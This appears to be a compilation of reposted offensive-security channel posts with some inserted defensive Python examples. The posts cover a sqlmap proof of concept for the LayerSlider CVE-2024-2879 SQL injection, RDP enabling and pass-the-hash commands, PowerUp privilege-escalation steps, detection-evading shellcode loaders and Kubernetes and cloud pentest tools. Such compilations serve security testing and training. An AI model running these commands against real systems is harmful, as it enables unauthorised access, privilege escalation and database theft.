Forwarded from Proxy Bar
CVE-2024-2879 LayerSlider plugin for WordPress

LayerSlider versions 7.9.11 - 7.10.0 - Unauthenticated SQL Injection

Insufficient escaping allows additional SQL to be appended to an existing query; as a result, it can be used to extract sensitive information from the database.

POC usage:
sqlmap "https://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T
or
sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T
#wordpress
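An added example (not from the original post and not LayerSlider's own code): a small Python detector that scans web server access logs for the request shape this advisory describes, i.e. admin-ajax.php with action=ls_get_popup_markup and an id[...] array parameter such as id[where]. The log lines are constructed for the example, and the combined (Apache/nginx style) log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format). They are made up
# for this example; the IPs are documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Apr/2024:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Apr/2024:10:01:05 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id%5Bwhere%5D=1 HTTP/1.1" 200 312 "-" "sqlmap/1.8"
203.0.113.9 - - [02/Apr/2024:10:01:09 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 312 "-" "sqlmap/1.8"
198.51.100.4 - - [02/Apr/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 8899 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_layerslider_where_injection(target: str) -> bool:
    """True if the request targets admin-ajax.php with action=ls_get_popup_markup
    and carries an id[...] array parameter (the id[where] vector from the advisory).
    The legitimate call uses a scalar id, so an array-style key is the signal."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    # parse_qs percent-decodes keys, so id%5Bwhere%5D becomes id[where].
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("action") != ["ls_get_popup_markup"]:
        return False
    return any(key.startswith("id[") for key in qs)


def find_suspicious_requests(log_text: str) -> list[tuple[str, str, str]]:
    """Return (client_ip, timestamp, decoded_target) for every matching GET line.
    POST bodies are not in an access log, so the 'sqlmap -r request.txt' form of
    the PoC needs a WAF or request-body logging to be seen."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        if is_layerslider_where_injection(m["target"]):
            hits.append((m["ip"], m["ts"], unquote(m["target"])))
    return hits


if __name__ == "__main__":
    for ip, ts, target in find_suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} {target}")
```

On the constructed log above the detector flags only the second line (the `id[where]` request from 203.0.113.9) and ignores the normal scalar-id call. Log matching is a stopgap for visibility only; the actual fix is moving the plugin to a version outside the affected range.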
Forwarded from Threat Hunt
#maldev #redteam
A tool that simulates AV/EDR behaviour. It lets you sharpen your defence-evasion skills while developing your own loaders.
1. Build the project
./compile.sh
2. Create an ioc.json file with the shellcode patterns
3. Run the tool and specify the PID of the malicious process:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
https://github.com/Helixo32/CrimsonEDR
GitHub: Helixo32/CrimsonEDR - Simulate the behavior of AV/EDR for malware development training.
Prototype pollution

Utils
* PPScan - client-side prototype pollution scanner
* fingerprint.js - script for finding gadgets
* untrusted-types - Chrome extension that abuses Trusted Types to log DOMXSS sinks
* pollute.js - simple tool to make it easier to exploit prototype pollution

List of known gadgets
* Link - examples of libraries that are vulnerable to prototype pollution
* Link - payloads for known libraries
WPA_Sycophant

A tool to relay phase 2 authentication attempts to access corporate wireless without cracking the password.
#wifi
GitHub: sensepost/wpa_sycophant - Evil client portion of EAP relay attack
Kubernetes pentest tools

* kube-hunter - a powerful tool from Aqua Security
* kubescape - finds cluster misconfigurations and RBAC issues, scans images
* kdigger - a tool for reconnaissance of the environment
* kubeletctl - a custom client for talking to the kubelet
* peirates - an all-in-one tool for pentesting a cluster, including from inside a pod
* BOtB - a tool for analysing and exploiting containers
Krew kubectl plugins - https://krew.sigs.k8s.io/plugins/
Provide RDP access

Turn on
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Bypass Restricted Admin Mode
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Connect
xfreerdp /v:10.10.10.10 /u:username /pth:<NT_HASH> /dynamic-resolution +clipboard
PowerUp

PowerUp.ps1 - aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.
Contains abuse modules such as:
* Token/Privilege Enumeration
* Service Enumeration
* DLL Hijacking
* Registry Checks
e.g.:
Display services the current user can modify
PS C:\Users\dave> Get-ModifiableServiceFile
PowerUp also provides an AbuseFunction, a built-in function that replaces the service binary and, if we have sufficient permissions, restarts the service. The default behaviour is to create a new local user called john with the password Password123! and add it to the local Administrators group.
PS C:\Users\dave> Install-ServiceBinary -Name 'vulnService'
#windows #privesc
This PowerShell script demonstrates advanced techniques including shellcode injection, dynamic function invocation, and PowerShell script obfuscation.
Link
GitHub: EvilBytecode/Shellcode-Loader - This is a way to load a shellcode and obfuscate it so it avoids scantime detection.
Windows Local Privilege Escalation Cookbook

Tactics & techniques for Windows privilege escalation with explanations, examples and labs for each case
Link
GitHub: nickvourd/Windows-Local-Privilege-Escalation-Cookbook - Windows Local Privilege Escalation Cookbook
A collection of manifests that create pods with different elevated privileges.
Quickly demonstrate the impact of allowing security-sensitive pod attributes like
* hostNetwork
* hostPID
* hostPath
* hostIPC
* privileged
#kubernetes
GitHub: BishopFox/badPods - A collection of manifests that will create pods with elevated privileges.
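An added example (not part of the original post and not badPods' own code): a Python checker that reads a pod manifest as a Python dict and reports exactly the five attributes listed above. It goes slightly beyond the post in also looking inside workload templates (Deployment/DaemonSet spec.template.spec) and initContainers. The manifest below is constructed for the example.

```python
# Constructed pod manifest for the example: the kind of "everything allowed" pod
# the badPods collection demonstrates. Not taken from the project itself.
SAMPLE_POD = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "everything-allowed"},
    "spec": {
        "hostNetwork": True,
        "hostPID": True,
        "hostIPC": False,
        "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
        "containers": [
            {
                "name": "c",
                "image": "busybox",
                "securityContext": {"privileged": True},
                "volumeMounts": [{"name": "noderoot", "mountPath": "/host"}],
            }
        ],
    },
}


def pod_spec(manifest: dict) -> dict:
    """Return the PodSpec for a bare Pod or for a workload (Deployment, DaemonSet,
    StatefulSet, Job) whose pods live under spec.template.spec."""
    spec = manifest.get("spec") or {}
    if "template" in spec:
        spec = (spec["template"] or {}).get("spec") or {}
    return spec


def find_elevated_attributes(manifest: dict) -> list[str]:
    """List every security-sensitive attribute from the post that the manifest sets:
    hostNetwork / hostPID / hostIPC on the spec, hostPath volumes, and
    privileged containers (including initContainers)."""
    spec = pod_spec(manifest)
    findings = []
    for flag in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(flag) is True:
            findings.append(f"spec.{flag}=true")
    for vol in spec.get("volumes") or []:
        if "hostPath" in vol:
            path = (vol["hostPath"] or {}).get("path", "")
            findings.append(f"volume '{vol.get('name')}' is a hostPath mount of '{path}'")
    for kind in ("initContainers", "containers"):
        for c in spec.get(kind) or []:
            sc = c.get("securityContext") or {}
            if sc.get("privileged") is True:
                findings.append(f"{kind}['{c.get('name')}'].securityContext.privileged=true")
    return findings


if __name__ == "__main__":
    for finding in find_elevated_attributes(SAMPLE_POD):
        print("elevated:", finding)
```

Run against the constructed manifest it reports four findings (hostNetwork, hostPID, the hostPath volume and the privileged container) and stays silent on hostIPC, which is explicitly false. In a real cluster the same checks are enforced by the Pod Security Admission baseline and restricted profiles, which reject all five attributes; a checker like this is useful for CI linting of manifests before they reach the API server.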
pspy - unprivileged Linux process snooping

It allows you to see commands run by other users, cron jobs, etc. as they execute.
The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
Also great to demonstrate why passing secrets as arguments on the command line is a bad idea.
Link
GitHub: DominicBreuker/pspy - Monitor linux processes without root permissions
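An added example (not pspy's code and not from the original post) that shows the mechanism behind the last sentence: /proc/<pid>/cmdline is world-readable by default, so any local user can read another user's argv. The script parses the NUL-separated cmdline format and flags arguments that look like inline credentials; the flag list and the sample cmdline are constructed for the example, and a one-shot /proc walk (no inotify triggering, which is what pspy adds) is included for running on a real host.

```python
import os

# Constructed list of option names that commonly carry a credential on the command
# line. This is a heuristic for the example, not an exhaustive or authoritative set.
SECRET_FLAGS = {"-p", "--password", "--token", "--secret", "--api-key", "--client-secret"}


def parse_cmdline(raw: bytes) -> list[str]:
    """/proc/<pid>/cmdline stores argv as NUL-separated strings with a trailing NUL."""
    return [arg.decode("utf-8", "replace") for arg in raw.split(b"\0") if arg]


def secret_args(argv: list[str]) -> list[str]:
    """Return the values an unprivileged reader of /proc/<pid>/cmdline would see as
    secrets: '--flag value', '--flag=value', and mysql-style '-pvalue'."""
    leaked = []
    i = 0
    while i < len(argv):
        arg = argv[i]
        name, eq, value = arg.partition("=")
        if eq and name in SECRET_FLAGS:
            leaked.append(value)
        elif arg in SECRET_FLAGS and i + 1 < len(argv):
            leaked.append(argv[i + 1])
            i += 1
        elif arg.startswith("-p") and not arg.startswith("--") and len(arg) > 2:
            leaked.append(arg[2:])  # e.g. mysql -pHunter2
        i += 1
    return leaked


def scan_proc(proc_root: str = "/proc") -> list[tuple[int, str, list[str]]]:
    """Walk every numeric /proc entry and report (pid, argv[0], leaked values).
    No root needed: cmdline is readable across users unless /proc is mounted
    with hidepid=1 or 2."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "cmdline"), "rb") as fh:
                argv = parse_cmdline(fh.read())
        except OSError:
            continue  # process exited between listdir and open, or hidepid in effect
        leaked = secret_args(argv)
        if argv and leaked:
            hits.append((int(entry), argv[0], leaked))
    return hits


# Constructed sample: what cmdline looks like for a mysql client started with -p.
SAMPLE_CMDLINE = b"mysql\0-u\0root\0-pHunter2\0-h\0db.internal\0"

if __name__ == "__main__":
    print("sample leaks:", secret_args(parse_cmdline(SAMPLE_CMDLINE)))
    for pid, exe, leaked in scan_proc():
        print(f"pid {pid} ({exe}) exposes: {leaked}")
```

The heuristic has false positives by design (tar -p, for instance, is a permission flag, not a password), which is acceptable for an audit that a human reviews. The mitigations this demonstrates are the usual ones: pass secrets via files with tight permissions or the environment rather than argv, and mount /proc with hidepid=2 on multi-user hosts so cmdline of other users' processes is not readable at all.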
Tools for studying Kubernetes security

* simulator (with AWS)
* kube_security_lab (on-premise)
Review of simulator - Link
#kubernetes
GitHub: controlplaneio/simulator - Kubernetes Security Training Platform - focusing on security mitigation
Multi Tool Kubernetes Pentest Image

This docker image by Luntry contains all the most popular and necessary tools for Kubernetes penetration testing
Inside:
* Shell via web
* Common tools for kube pentest
* Bypass read-only container file system
* Bypass signature engine
#kubernetes
GitHub: r0binak/MTKPI - Multi Tool Kubernetes Pentest Image
Multi-Cloud tools

Tools for testing cloud environments
* PurplePanda - finds misconfigurations and privesc paths. Cloud/SaaS
* Prowler - audits, incident response and much more in environments such as AWS, Azure, GCP and Kubernetes
* CloudSploit by Aqua - Cloud Security Scans
* ScoutSuite - Multi-Cloud Security Auditing Tool

Representing infrastructure objects and the relationships between them as a Neo4j graph
* cartography
* starbase
* IceKube
* KubeHound

Additional list of cloud-sec tools - Link